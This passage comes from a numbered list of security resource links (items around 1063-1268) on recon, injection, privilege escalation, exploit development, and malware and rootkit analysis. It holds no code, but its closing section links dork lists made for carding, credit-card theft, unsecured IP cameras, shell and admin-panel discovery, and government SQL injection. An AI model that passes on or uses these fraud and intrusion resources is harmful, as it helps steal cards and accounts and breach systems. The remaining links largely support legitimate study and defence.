penetration testers:\n\n\nhttps://twitter.com/cry__pto/status/1142497470825545729?s=20\n\n\n\n-1064-useful #BugBounty resources & links & tutorials & explanations & writeups ::\n\n\nhttps://twitter.com/cry__pto/status/1143965322233483265?s=20\n\n\n\n-1065-Union- based SQL injection:\n\n\nhttp://securityidiots.com/Web-Pentest/SQL-Injection/Basic-Union-Based-SQL-Injection.html\n\n\n-1066-Broken access control:\n\n\nhttps://www.happybearsoftware.com/quick-check-for-access-control-vulnerabilities-in-rails\n\n\n-1067-Understanding firewall types and configurations:\n\n\nhttp://searchsecurity.techtarget.com/feature/The-five-different-types-of-firewalls\n\n\n-1068-5 Kali Linux tricks that you may not know:\n\n\nhttps://pentester.land/tips-n-tricks/2018/11/09/5-kali-linux-tricks-that-you-may-not-know.html\n\n\n\n-1069-5 tips to make the most of Twitter as a pentester or bug bounty hunter:\n\n\nhttps://pentester.land/tips-n-tricks/2018/10/23/5-tips-to-make-the-most-of-twitter-as-a-pentester-or-bug-bounty-hunter.html\n\n\n-1060-A Guide To Subdomain Takeovers:\n\n\nhttps://www.hackerone.com/blog/Guide-Subdomain-Takeovers\n\n\n-1061-Advanced Recon Automation (Subdomains) case 1:\n\n\nhttps://medium.com/p/9ffc4baebf70\n\n\n-1062-Security testing for REST API with w3af:\n\n\nhttps://medium.com/quick-code/security-testing-for-rest-api-with-w3af-2c43b452e457?source=post_recirc---------0------------------\n\n\n\n-1062-The Lazy Hacker:\n\n\nhttps://securit.ie/blog/?p=86\n\n\n-1063-Practical recon techniques for bug hunters & pen testers:\n\n\nhttps://github.com/appsecco/practical-recon-levelup0x02/raw/200c43b58e9bf528a33c9dfa826fda89b229606c/practical_recon.md\n\n\n\n-1064-A More Advanced Recon Automation #1 (Subdomains):\n\n\nhttps://poc-server.com/blog/2019/01/18/advanced-recon-subdomains/\n\n\n\n-1065-Expanding your scope (Recon automation #2):\n\n\n\nhttps://poc-server.com/blog/2019/01/31/expanding-your-scope-recon-automation/\n\n\n\n-1066-RCE by uploading a web.config:\n\n\n\nhttps://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/\n\n\n\n-1067-Finding and exploiting Blind XSS:\n\n\nhttps://enciphers.com/finding-and-exploiting-blind-xss/\n\n\n\n-1068-Google dorks list 2018:\n\n\nhttp://conzu.de/en/google-dork-liste-2018-conzu\n\n\n-1096-Out of Band Exploitation (OOB) CheatSheet:\n\n\nhttps://www.notsosecure.com/oob-exploitation-cheatsheet/\n\n\n-1070-Metasploit Cheat Sheet:\n\n\nhttps://nitesculucian.github.io/2018/12/01/metasploit-cheat-sheet/\n\n\n\n\n-1071-Linux Post Exploitation Cheat Sheet :\n\n\n\nred-orbita.com/?p=8455\n\n\n\n\n\n-1072-OSCP/Pen Testing Resources :\n\n\nhttps://medium.com/@sdgeek/oscp-pen-testing-resources-271e9e570d45\n\n\n\n-1073-Out Of Band Exploitation (OOB) CheatSheet :\n\n\nhttps://packetstormsecurity.com/files/149290/Out-Of-Band-Exploitation-OOB-CheatSheet.html\n\n\n\n\n-1074-HTML5 Security Cheatsheet:\n\n\nhttps://html5sec.org/\n\n\n\n-1075-Kali Linux Cheat Sheet for Penetration Testers:\n\n\nhttps://www.blackmoreops.com/2016/12/20/kali-linux-cheat-sheet-for-penetration-testers/\n\n\n\n\n-1076-Responder - CheatSheet:\n\n\nhttps://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/\n\n\n\n\n-1076-Windows Post-Exploitation Command List:\n\n\n\npentest.tonyng.net/windows-post-exploitation-command-list/\n\n\n\n\n-1077-Transfer files (Post explotation) - CheatSheet\n\n\n\nhttps://ironhackers.es/en/cheatsheet/transferir-archivos-post-explotacion-cheatsheet/\n\n\n\n-1078-SQL Injection Cheat Sheet: MSSQL — GracefulSecurity:\n\n\n\nhttps://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/\n\n\n\n-1079-OSCP useful resources and tools:\n\n\n\nhttps://acknak.fr/en/articles/oscp-tools/\n\n\n\n-1080-Penetration Testing 102 - Windows Privilege Escalation - Cheatsheet:\n\n\nwww.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet\n\n\n\n-1081-Transferring files from Kali to Windows (post exploitation) :\n\n\n\nhttps://blog.ropnop.com/transferring-files-from-kali-to-windows/\n\n\n\n-1082-Hack Like a Pro: The Ultimate Command Cheat Sheet for Metasploit:\n\n\n\nhttps://null-byte.wonderhowto.com/.../hack-like-pro-ultimate-command-cheat-sheet-f...\n\n\n\n\n-1083-OSCP Goldmine (not clickbait):\n\n\n\n0xc0ffee.io/blog/OSCP-Goldmine\n\n\n\n-1084-Privilege escalation: Linux :\n\n\n\nhttps://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux\n\n\n\n\n-1085-Exploitation Tools Archives :\n\n\n\nhttps://pentesttools.net/category/exploitationtools/\n\n\n\n-1086-From Local File Inclusion to Remote Code Execution - Part 1:\n\n\n\nhttps://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1\n\n\n\n\n-1087-Basic Linux Privilege Escalation:\n\n\n\nhttps://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/\n\n\n\n-1088-Title: Ultimate Directory Traversal & Path Traversal Cheat Sheet:\n\n\n\nwww.vulnerability-lab.com/resources/documents/587.txt\n\n\n\n-1089-Binary Exploitation:\n\n\n\nhttps://pwndevils.com/hacking/howtwohack.html\n\n\n\n\n1090-A guide to Linux Privilege Escalation:\n\n\nhttps://payatu.com/guide-linux-privilege-escalation/\n\n\n\n-1091-Penetration Testing Tools Cheat Sheet :\n\n\n\nhttps://news.ycombinator.com/item?id=11977304\n\n\n\n\n-1092-List of Metasploit Commands - Cheatsheet:\n\n\n\nhttps://thehacktoday.com/metasploit-commands/\n\n\n\n-1093-A journey into Radare 2 – Part 2: Exploitation:\n\n\n\nhttps://www.megabeets.net/a-journey-into-radare-2-part-2/\n\n\n\n-1094-Remote Code Evaluation (Execution) Vulnerability:\n\n\n\nhttps://www.netsparker.com/blog/web-security/remote-code-evaluation-execution/\n\n\n\n-1095-Exploiting Python Code Injection in Web Applications:\n\n\n\nhttps://www.securitynewspaper.com/.../exploiting-python-code-injection-web-applicat...\n\n\n\n\n-1096-Shells · Total OSCP Guide:\n\n\n\nhttps://sushant747.gitbooks.io/total-oscp-guide/reverse-shell.html\n\n\n\n-1097-MongoDB Injection cheat sheet Archives:\n\n\n\nhttps://blog.securelayer7.net/tag/mongodb-injection-cheat-sheet/\n\n\n\n-1098-Basic Shellshock Exploitation:\n\n\n\nhttps://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/\n\n\n\n-1099-Wireshark Tutorial and Tactical Cheat Sheet :\n\n\nhttps://hackertarget.com/wireshark-tutorial-and-cheat-sheet/\n\n\n\n-1100-Windows Command Line cheatsheet (part 2):\n\n\nhttps://www.andreafortuna.org/2017/.../windows-command-line-cheatsheet-part-2-wm...\n\n\n\n-1101-Detecting WMI exploitation:\n\n\n\nwww.irongeek.com/i.php?page=videos/derbycon8/track-3-03...exploitation...\n\n\n\n1102-Metasploit Cheat Sheet - Hacking Land :\n\n\n\nhttps://www.hacking.land/2019/02/metasploit-cheat-sheet.html\n\n\n\n\n-1103-5 Practical Scenarios for XSS Attacks:\n\n\n\nhttps://pentest-tools.com/blog/xss-attacks-practical-scenarios/\n\n\n\n-1104-Ultimate gdb cheat sheet:\n\n\n\nhttp://nadavclaudecohen.com/2017/10/10/ultimate-gdb-cheat-sheet/\n\n\n\n-1105-Reverse Engineering Cheat Sheet:\n\n\nhttps://www.scribd.com/doc/38163906/Reverse-Engineering-Cheat-Sheet\n\n\n\n-1106-Reverse Engineering Cheat Sheet:\n\n\n\nhttps://www.scribd.com/document/94575179/Reverse-Engineering-Cheat-Sheet\n\n\n\n-1107-Reverse Engineering For Malware Analysis:\n\n\n\nhttps://eforensicsmag.com/reverse_engi_cheatsheet/\n\n\n\n\n-1108-Reverse-engineering Cheat Sheets :\n\n\n\nhttps://www.cheatography.com/tag/reverse-engineering/\n\n\n\n-1109-Shortcuts for Understanding Malicious Scripts:\n\n\n\nhttps://www.linkedin.com/pulse/shortcuts-understanding-malicious-scripts-viviana-ross\n\n\n\n\n\n-1110-WinDbg Malware Analysis Cheat Sheet :\n\n\n\nhttps://oalabs.openanalysis.net/2019/02/18/windbg-for-malware-analysis/\n\n\n\n\n-1111-Cheat Sheet for Malware Analysis:\n\n\n\n\nhttps://www.andreafortuna.org/2016/08/16/cheat-sheet-for-malware-analysis/\n\n\n\n\n-1112-Tips for Reverse-Engineering Malicious Code :\n\n\n\nhttps://www.digitalmunition.me/tips-reverse-engineering-malicious-code-new-cheat-sheet\n\n\n\n-1113-Cheatsheet for radare2 :\n\n\n\nhttps://leungs.xyz/reversing/2018/04/16/radare2-cheatsheet.html\n\n\n\n\n\n-1114-Reverse Engineering Cheat Sheets:\n\n\n\n\nhttps://www.pinterest.com/pin/576390452300827323/\n\n\n\n\n-1115-Reverse Engineering Resources-Beginners to intermediate Guide/Links:\n\n\n\nhttps://medium.com/@vignesh4303/reverse-engineering-resources-beginners-to-intermediate-guide-links-f64c207505ed\n\n\n\n\n\n-1116-Malware Resources :\n\n\n\nhttps://www.professor.bike/malware-resources\n\n\n\n-1117-Zero-day exploits: A cheat sheet for professionals:\n\n\nhttps://www.techrepublic.com/article/zero-day-exploits-the-smart-persons-guide/\n\n\n\n-1118-Getting cozy with exploit development:\n\n\n\nhttps://0x00sec.org/t/getting-cozy-with-exploit-development/5311\n\n\n\n\n\n-1119-appsec - Web Security Cheatsheet :\n\n\nhttps://security.stackexchange.com/questions/2985/web-security-cheatsheet-todo-list\n\n\n\n\n-1120-PEDA - Python Exploit Development Assistance For GDB:\n\n\n\nhttps://www.pinterest.ru/pin/789044797190775841/\n\n\n\n-1121-Exploit Development Introduction (part 1) :\n\n\n\nhttps://www.cybrary.it/video/exploit-development-introduction-part-1/\n\n\n\n-1122-Windows Exploit Development: A simple buffer overflow example:\n\n\nhttps://medium.com/bugbountywriteup/windows-expliot-dev-101-e5311ac284a\n\n\n\n\n-1123-Exploit Development-Everything You Need to Know:\n\n\n\nhttps://null-byte.wonderhowto.com/how-to/exploit-development-everything-you-need-know-0167801/\n\n\n\n-1124-Exploit Development :\n\n\nhttps://0x00sec.org/c/exploit-development\n\n\n\n-1125-Exploit Development - Infosec Resources:\n\n\n\nhttps://resources.infosecinstitute.com/category/exploit-development/\n\n\n\n-1126-Exploit Development :\n\n\n\nhttps://www.reddit.com/r/ExploitDev/\n\n\n\n-1127-A Study in Exploit Development - Part 1: Setup and Proof of Concept :\n\n\n\nhttps://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-concept\n\n\n\n-1128-Exploit Development for Beginners:\n\n\nhttps://www.youtube.com/watch?v=tVDuuz60KKc\n\n\n\n-1129-Introduction to Exploit Development:\n\n\n\nhttps://www.fuzzysecurity.com/tutorials/expDev/1.html\n\n\n\n-1130-Exploit Development And Reverse Engineering:\n\n\n\nhttps://www.immunitysec.com/services/exploit-dev-reverse-engineering.html\n\n\n\n-1131-wireless forensics:\n\n\n\nhttps://www.sans.org/reading-room/whitepapers/wireless/80211-network-forensic-analysis-33023\n\n\n\n-1132-fake AP Detection:\n\n\nhttps://www.sans.org/reading-room/whitepapers/detection/detecting-preventing-rogue-devices-network-1866\n\n\n\n-1133-In-Depth analysis of SamSam Ransomware:\n\n\nhttps://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/\n\n\n\n-1134-WannaCry ransomware:\n\n\nhttps://www.endgame.com/blog/technical-blog/wcrywanacry-ransomware-technical-analysis\n\n\n\n-1135-malware analysis:\n\n\nhttps://www.sans.org/reading-room/whitepapers/malicious/paper/2103\n\n\n\n-1136-Metasploit's detailed communication and protocol writeup:\n\n\nhttps://www.exploit-db.com/docs/english/27935-metasploit---the-exploit-learning-tree.pdf\n\n\n\n-1137-Metasploit's SSL-generation module::\n\n\n\nhttps://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/lib/rex/post/meterpreter/client.rb\n\n\n\n-1139-Empire IOCs::\n\n\nhttps://www.sans.org/reading-room/whitepapers/detection/disrupting-empire-identifying-powershell-empire-command-control-activity-38315\n\n\n\n-1140-excellent free training on glow analysis:\n\n\nhttp://opensecuritytraining.info/Flow.html\n\n\n-1141-NetFlow using Silk:\n\n\nhttps://tools.netsa.cert.org/silk/analysis-handbook.pdf\n\n\n\n-1142-Deep Packet Inspection:\n\n\nhttps://is.muni.cz/th/ql57c/dp-svoboda.pdf\n\n\n\n-1143-Detecting Behavioral Personas with OSINT and Datasploit:\n\n\nhttps://www.exploit-db.com/docs/45543\n\n\n\n-1144-WordPress Penetration Testing using WPScan and MetaSploit:\n\n\nhttps://www.exploit-db.com/docs/45556\n\n\n\n-1145-Bulk SQL Injection using Burp-to-SQLMap:\n\n\n\nhttps://www.exploit-db.com/docs/45428\n\n\n\n\n-1146-XML External Entity Injection - Explanation and Exploitation:\n\n\n\nhttps://www.exploit-db.com/docs/45374\n\n\n\n\n-1147-\tWeb Application Firewall (WAF) Evasion Techniques #3 (CloudFlare and ModSecurity OWASP CRS3):\n\n\n\nhttps://www.exploit-db.com/docs/45368\n\n\n\n-1148-File Upload Restrictions Bypass:\n\n\nhttps://www.exploit-db.com/docs/45074\n\n\n\n-1149-VLAN Hopping Attack:\n\n\nhttps://www.exploit-db.com/docs/45050\n\n\n\n\n-1150-Jigsaw Ransomware Analysis using Volatility:\n\n\nhttps://medium.com/@0xINT3/jigsaw-ransomware-analysis-using-volatility-2047fc3d9be9\n\n\n\n-1151-Ransomware early detection by the analysis of file sharing traffic:\n\n\n\nhttps://www.sciencedirect.com/science/article/pii/S108480451830300X\n\n\n\n\n-1152-Do You Think You Can Analyse Ransomware?:\n\n\n\nhttps://medium.com/asecuritysite-when-bob-met-alice/do-you-think-you-can-analyse-ransomware-bbc813b95529\n\n\n\n\n-1153-Analysis of LockerGoga Ransomware :\n\n\n\nhttps://labsblog.f-secure.com/2019/03/27/analysis-of-lockergoga-ransomware/\n\n\n\n\n-1154-Detection and Forensic Analysis of Ransomware Attacks :\n\n\n\nhttps://www.netfort.com/assets/NetFort-Ransomware-White-Paper.pdf\n\n\n\n\n-1155-Bad Rabbit Ransomware Technical Analysis:\n\n\nhttps://logrhythm.com/blog/bad-rabbit-ransomware-technical-analysis/\n\n\n\n\n-1156-NotPetya Ransomware analysis :\n\n\nhttps://safe-cyberdefense.com/notpetya-ransomware-analysis/\n\n\n\n-1157-Identifying WannaCry on Your Server Using Logs:\n\n\n\nhttps://www.loggly.com/blog/identifying-wannacry-server-using-logs/\n\n\n\n\n-1158-The past, present, and future of ransomware:\n\n\nhttps://www.itproportal.com/features/the-past-present-and-future-of-ransomware/\n\n\n\n\n-1159-The dynamic analysis of WannaCry ransomware :\n\n\n\nhttps://ieeexplore.ieee.org/iel7/8318543/8323471/08323682.pdf\n\n\n\n-1160-Malware Analysis: Ransomware - SlideShare:\n\n\n\nhttps://www.slideshare.net/davidepiccardi/malware-analysis-ransomware\n\n\n\n\n-1161-Article: Anatomy of ransomware malware: detection, analysis :\n\n\nhttps://www.inderscience.com/info/inarticle.php?artid=84399\n\n\n\n-1162-Tracking desktop ransomware payments :\n\n\nhttps://www.blackhat.com/docs/us-17/wednesday/us-17-Invernizzi-Tracking-Ransomware-End-To-End.pdf\n\n\n\n\n-1163-What is Ransomware? Defined, Explained, and Explored:\n\n\n\nhttps://www.forcepoint.com/cyber-edu/ransomware\n\n\n\n-1164-Detect and Recover from Ransomware Attacks:\n\n\nhttps://www.indexengines.com/ransomware\n\n\n\n\n-1165-Wingbird rootkit analysis:\n\n\nhttps://artemonsecurity.blogspot.com/2017/01/wingbird-rootkit-analysis.html\n\n\n\n-1166-Windows Kernel Rootkits: Techniques and Analysis:\n\n\nhttps://www.offensivecon.org/trainings/2019/windows-kernel-rootkits-techniques-and-analysis.html\n\n\n\n-1167-Rootkit: What is a Rootkit and How to Detect It :\n\n\n\nhttps://www.veracode.com/security/rootkit\n\n\n\n-1168-Dissecting Turla Rootkit Malware Using Dynamic Analysis:\n\n\n\nhttps://www.lastline.com/.../dissecting-turla-rootkit-malware-using-dynamic-analysis/\n\n\n\n-1169-Rootkits and Rootkit Detection (Windows Forensic Analysis) Part 2:\n\n\n\nhttps://what-when-how.com/windows-forensic-analysis/rootkits-and-rootkit-detection-windows-forensic-analysis-part-2/\n\n\n\n\n-1170-ZeroAccess – an advanced kernel mode rootkit :\n\n\n\nhttps://www.botnetlegalnotice.com/ZeroAccess/files/Ex_12_Decl_Anselmi.pdf\n\n\n\n-1171-Rootkit Analysis Identification Elimination:\n\n\n\nhttps://acronyms.thefreedictionary.com/Rootkit+Analysis+Identification+Elimination\n\n\n\n\n\n-1172-TDL3: The Rootkit of All Evil?:\n\n\n\nstatic1.esetstatic.com/us/resources/white-papers/TDL3-Analysis.pdf\n\n\n\n\n-1173-Avatar Rootkit: Dropper Analysis:\n\n\n\nhttps://resources.infosecinstitute.com/avatar-rootkit-dropper-analysis-part-1/\n\n\n\n-1174-Sality rootkit analysis:\n\n\n\nhttps://www.prodefence.org/sality-rootkit-analysis/\n\n\n\n\n-1175-RootKit Hook Analyzer:\n\n\nhttps://www.resplendence.com/hookanalyzer/\n\n\n\n\n-1176-Behavioral Analysis of Rootkit Malware:\n\n\n\nhttps://isc.sans.edu/forums/diary/Behavioral+Analysis+of+Rootkit+Malware/1487/\n\n\n\n\n-1177-Malware Memory Analysis of the IVYL Linux Rootkit:\n\n\n\nhttps://apps.dtic.mil/docs/citations/AD1004349\n\n\n\n\n-1178-Analysis of the KNARK rootkit :\n\n\nhttps://linuxsecurity.com/news/intrusion-detection/analysis-of-the-knark-rootkit\n\n\n\n\n-1179-32 Bit Windows Kernel Mode Rootkit Lab Setup with INetSim :\n\n\n\nhttps://medium.com/@eaugusto/32-bit-windows-kernel-mode-rootkit-lab-setup-with-inetsim-e49c22e9fcd1\n\n\n\n-1180-Ten Process Injection Techniques: A Technical Survey of Common and Trending Process Injection Techniques:\n\n\n\nhttps://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process\n\n\n\n-1181-Code & Process Injection - Red Teaming Experiments:\n\n\n\nhttps://ired.team/offensive-security/code-injection-process-injection\n\n\n\n\n-1182-What Malware Authors Don't want you to know:\n\n\n\nhttps://www.blackhat.com/.../asia-17-KA-What-Malware-Authors-Don't-Want-You-To-Know\n\n\n\n\n-1183-.NET Process Injection:\n\n\n\nhttps://medium.com/@malcomvetter/net-process-injection-1a1af00359bc\n\n\n\n-1184-Memory Injection like a Boss :\n\n\n\nhttps://www.countercept.com/blog/memory-injection-like-a-boss/\n\n\n\n\n-1185-Process injection - Malware style:\n\n\n\nhttps://www.slideshare.net/demeester1/process-injection\n\n\n\n-1186-Userland API Monitoring and Code Injection Detection:\n\n\n\nhttps://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565\n\n\n\n\n-1187-Unpacking Redaman Malware & Basics of Self-Injection Packers:\n\n\n\nhttps://liveoverflow.com/unpacking-buhtrap-malware-basics-of-self-injection-packers-ft-oalabs-2/\n\n\n\n\n-1188-Code injection on macOS:\n\n\n\nhttps://knight.sc/malware/2019/03/15/code-injection-on-macos.html\n\n\n\n-1189-(Shell)Code Injection In Linux Userland :\n\n\n\nhttps://blog.sektor7.net/#!res/2018/pure-in-memory-linux.md\n\n\n\n\n-1190-Code injection on Windows using Python:\n\n\n\nhttps://www.andreafortuna.org/2018/08/06/code-injection-on-windows-using-python-a-simple-example/\n\n\n\n\n-1191-What is Reflective DLL Injection and how can be detected?:\n\n\n\nhttps://www.andreafortuna.org/cybersecurity/what-is-reflective-dll-injection-and-how-can-be-detected/\n\n\n\n\n-1192-Windows Process Injection:\n\n\n\nhttps://modexp.wordpress.com/2018/08/23/process-injection-propagate/\n\n\n\n-1193-A+ cheat sheet:\n\n\n\nhttps://www.slideshare.net/abnmi/a-cheat-sheet\n\n\n-1194-A Bettercap Tutorial — From Installation to Mischief:\n\n\nhttps://danielmiessler.com/study/bettercap/\n\n\n\n\n-1195-Debugging Malware with WinDbg:\n\n\n\nhttps://www.ixiacom.com/company/blog/debugging-malware-windbg\n\n\n\n\n-1195-Malware analysis, my own list of tools and resources:\n\n\n\nhttps://www.andreafortuna.org/2016/08/05/malware-analysis-my-own-list-of-tools-and-resources/\n\n\n\n-1196-Getting Started with Reverse Engineering:\n\n\nhttps://lospi.net/developing/software/.../assembly/2015/03/.../reversing-with-ida.html\n\n\n\n-1197-Debugging malicious windows scriptlets with Google chrome:\n\n\n\nhttps://medium.com/@0xamit/debugging-malicious-windows-scriptlets-with-google-chrome-c31ba409975c\n\n\n\n-1198-Intro to Radare2 for Malware Analysis:\n\n\n\nhttps://malwology.com/2018/11/30/intro-to-radare2-for-malware-analysis/\n\n\n\n\n-1199-Intro to Malware Analysis and Reverse Engineering:\n\n\n\nhttps://www.cybrary.it/course/malware-analysis/\n\n\n\n-1200-Common Malware Persistence Mechanisms:\n\n\nhttps://resources.infosecinstitute.com/common-malware-persistence-mechanisms/\n\n\n\n-1201-Finding Registry Malware Persistence with RECmd:\n\n\n\nhttps://digital-forensics.sans.org/blog/2019/05/07/malware-persistence-recmd\n\n\n\n-1202-Windows Malware Persistence Mechanisms :\n\n\nhttps://www.swordshield.com/blog/windows-malware-persistence-mechanisms/\n\n\n\n-1203- persistence techniques:\n\n\n\nhttps://www.andreafortuna.org/2017/07/06/malware-persistence-techniques/\n\n\n\n-1204- Persistence Mechanism - an overview | ScienceDirect Topics:\n\n\nhttps://www.sciencedirect.com/topics/computer-science/persistence-mechanism\n\n\n\n-1205-Malware analysis for Linux:\n\n\nhttps://www.sothis.tech/en/malware-analysis-for-linux-wirenet/\n\n\n\n-1206-Linux Malware Persistence with Cron:\n\n\nhttps://www.sandflysecurity.com/blog/linux-malware-persistence-with-cron/\n\n\n\n-1207-What is advanced persistent threat (APT)? :\n\n\n\nhttps://searchsecurity.techtarget.com/definition/advanced-persistent-threat-APT\n\n\n\n-1208-Malware Analysis, Part 1: Understanding Code Obfuscation :\n\n\nhttps://www.vadesecure.com/en/malware-analysis-understanding-code-obfuscation-techniques/\n\n\n\n-1209-Top 6 Advanced Obfuscation Techniques:\n\n\n\nhttps://sensorstechforum.com/advanced-obfuscation-techniques-malware/\n\n\n\n-1210-Malware Obfuscation Techniques:\n\n\n\nhttps://dl.acm.org/citation.cfm?id=1908903\n\n\n\n-1211-How Hackers Hide Their Malware: Advanced Obfuscation:\n\n\n\nhttps://www.darkreading.com/attacks-breaches/how-hackers-hide-their-malware-advanced-obfuscation/a/d-id/1329723\n\n\n\n\n-1212-Malware obfuscation techniques: four simple examples:\n\n\n\nhttps://www.andreafortuna.org/2016/10/13/malware-obfuscation-techniques-four-simple-examples/\n\n\n\n-1213-Malware Monday: Obfuscation:\n\n\nhttps://medium.com/@bromiley/malware-monday-obfuscation-f65239146db0\n\n\n\n-1213-Challenge of Malware Analysis: Malware obfuscation Techniques:\n\n\n\nhttps://www.ijiss.org/ijiss/index.php/ijiss/article/view/327\n\n\n\n\n-1214-Static Malware Analysis - Infosec Resources:\n\n\n\nhttps://resources.infosecinstitute.com/malware-analysis-basics-static-analysis/\n\n\n\n\n-1215-Malware Basic Static Analysis:\n\n\n\nhttps://medium.com/@jain.sm/malware-basic-static-analysis-cf19b4600725\n\n\n\n-1216-Difference Between Static Malware Analysis and Dynamic Malware Analysis:\n\n\n\nhttp://www.differencebetween.net/technology/difference-between-static-malware-analysis-and-dynamic-malware-analysis/\n\n\n\n\n-1217-What is Malware Analysis | Different Tools for Malware Analysis:\n\n\n\nhttps://blog.comodo.com/different-techniques-for-malware-analysis/\n\n\n\n-1218-Detecting Malware Pre-execution with Static Analysis and Machine Learning:\n\n\n\nhttps://www.sentinelone.com/blog/detecting-malware-pre-execution-static-analysis-machine-learning/\n\n\n\n\n-1219-Limits of Static Analysis for Malware Detection:\n\n\n\nhttps://ieeexplore.ieee.org/document/4413008\n\n\n\n-1220-Kernel mode versus user mode:\n\n\nhttps://blog.codinghorror.com/understanding-user-and-kernel-mode/\n\n\n\n-1221-Understanding the ELF:\n\n\nhttps://medium.com/@MrJamesFisher/understanding-the-elf-4bd60daac571\n\n\n\n-1222-Windows Privilege Abuse: Auditing, Detection, and Defense:\n\n\n\nhttps://medium.com/palantir/windows-privilege-abuse-auditing-detection-and-defense-3078a403d74e\n\n\n\n-1223-First steps to volatile memory analysis:\n\n\n\nhttps://medium.com/@zemelusa/first-steps-to-volatile-memory-analysis-dcbd4d2d56a1\n\n\n-1224-Maliciously Mobile: A Brief History of Mobile Malware:\n\n\n\nhttps://medium.com/threat-intel/mobile-malware-infosec-history-70f3fcaa61c8\n\n\n\n\n-1225-Modern Binary Exploitation Writeups 0x01:\n\n\n\nhttps://medium.com/bugbountywriteup/binary-exploitation-5fe810db3ed4\n\n\n-1226-Exploit Development 01 — Terminology:\n\n\n\nhttps://medium.com/@MKahsari/exploit-development-01-terminology-db8c19db80d5\n\n\n\n-1227-Zero-day exploits: A cheat sheet for professionals:\n\n\nhttps://www.techrepublic.com/article/zero-day-exploits-the-smart-persons-guide/\n\n\n-1228-Best google hacking list on the net:\n\n\nhttps://pastebin.com/x5LVJu9T\n\n\n\n-1229-Google Hacking:\n\n\nhttps://pastebin.com/6nsVK5Xi\n\n\n\n-1230-OSCP links:\n\n\nhttps://pastebin.com/AiYV80uQ\n\n\n\n\n-1231-Pentesting 1 Information gathering:\n\n\n\nhttps://pastebin.com/qLitw9eT\n\n\n\n\n-1232-OSCP-Survival-Guide:\n\n\nhttps://pastebin.com/kdc6th08\n\n\n\n-1233-Googledork:\n\n\nhttps://pastebin.com/qKwU37BK\n\n\n\n\n-1234-Exploit DB:\n\n\n\nhttps://pastebin.com/De4DNNKK\n\n\n\n-1235-Dorks:\n\n\n\nhttps://pastebin.com/cfVcqknA\n\n\n\n-1236-GOOGLE HACKİNG DATABASE:\n\n\n\nhttps://pastebin.com/1ndqG7aq\n\n\n\n-1237-Carding Dorks 2019:\n\n\n\nhttps://pastebin.com/Hqsxu6Nn\n\n\n\n-1238-17k Carding Dorks 2019:\n\n\n\nhttps://pastebin.com/fgdZxy74\n\n\n\n\n\n-1239-CARDING DORKS 2019:\n\n\n\nhttps://pastebin.com/Y7KvzZqg\n\n\n\n\n-1240-sqli dork 2019:\n\n\nhttps://pastebin.com/8gdeLYvU\n\n\n\n\n-1241-Private Carding Dorks 2018:\n\n\n\nhttps://pastebin.com/F0KxkMMD\n\n\n\n-1242-20K dorks list fresh full carding 2018:\n\n\n\nhttps://pastebin.com/LgCh0NRJ\n\n\n\n\n-1243-8k Carding Dorks :):\n\n\n\nhttps://pastebin.com/2bjBPiEm\n\n\n\n\n-1244-8500 SQL DORKS:\n\n\n\nhttps://pastebin.com/yeREBFzp\n\n\n\n\n-1245-REAL CARDING DORKS:\n\n\n\nhttps://pastebin.com/0kMhA0Gb\n\n\n\n\n-1246-15k btc dorks:\n\n\n\nhttps://pastebin.com/zbbBXSfG\n\n\n\n\n-1247-Sqli dorks 2016-2017:\n\n\n\nhttps://pastebin.com/7TQiMj3A\n\n\n\n\n-1248-Here is kind of a tutorial on how to write google dorks.:\n\n\n\nhttps://pastebin.com/hZCXrAFK\n\n\n\n\n-1249-10k Private Fortnite Dorks:\n\n\n\nhttps://pastebin.com/SF9UmG1Y\n\n\n\n\n-1250-find login panel dorks:\n\n\n\nhttps://pastebin.com/9FGUPqZc\n\n\n\n\n\n\n-1251-Shell dorks:\n\n\n\n\nhttps://pastebin.com/iZBFQ5yp\n\n\n\n\n-1252-HQ PAID GAMING DORKS:\n\n\n\nhttps://pastebin.com/vNYnyW09\n\n\n\n\n-1253-10K HQ Shopping DORKS:\n\n\n\nhttps://pastebin.com/HTP6rAt4\n\n\n\n\n-1254-Exploit Dorks for Joomla,FCK and others 2015 Old but gold:\n\n\n\nhttps://pastebin.com/ttxAJbdW\n\n\n\n-1255-Gain access to unsecured IP cameras with these Google dorks:\n\n\n\n\nhttps://pastebin.com/93aPbwwE\n\n\n\n\n-1256-new fresh dorks:\n\n\n\nhttps://pastebin.com/ZjdxBbNB\n\n\n\n-1257-SQL DORKS FOR CC:\n\n\n\nhttps://pastebin.com/ZQTHwk2S\n\n\n\n\n-1258-Wordpress uploadify Dorks Priv8:\n\n\n\nhttps://pastebin.com/XAGmHVUr\n\n\n\n\n-1259-650 DORKS CC:\n\n\n\nhttps://pastebin.com/xZHARTyz\n\n\n\n\n-1260-3k Dorks Shopping:\n\n\n\nhttps://pastebin.com/e1XiNa8M\n\n\n\n\n\n-1261-DORKS 2018 :\n\n\n\nhttps://pastebin.com/YAZkPJ0j\n\n\n\n-1262-HQ FORTNITE DORKS LIST:\n\n\n\n\nhttps://pastebin.com/rzhiNad8\n\n\n\n\n-1263-HQ PAID DORKS MIXED GAMING LOL STEAM ..MUSIC SHOPING:\n\n\n\nhttps://pastebin.com/VwVpAvj2\n\n\n\n\n-1264-Camera dorks:\n\n\n\nhttps://pastebin.com/fsARft2j\n\n\n\n\n-1265-Admin Login Dorks:\n\n\n\n\nhttps://pastebin.com/HWWNZCph\n\n\n\n\n-1266-sql gov dorks:\n\n\n\nhttps://pastebin.com/C8wqyNW8\n\n\n\n-1267-10k hq gaming dorks:\n\n\n\nhttps://pastebin.com/cDLN8edi\n\n\n\n\n-1268-HQ SQLI Google Dorks For Shops/Amazon! Enjoy! 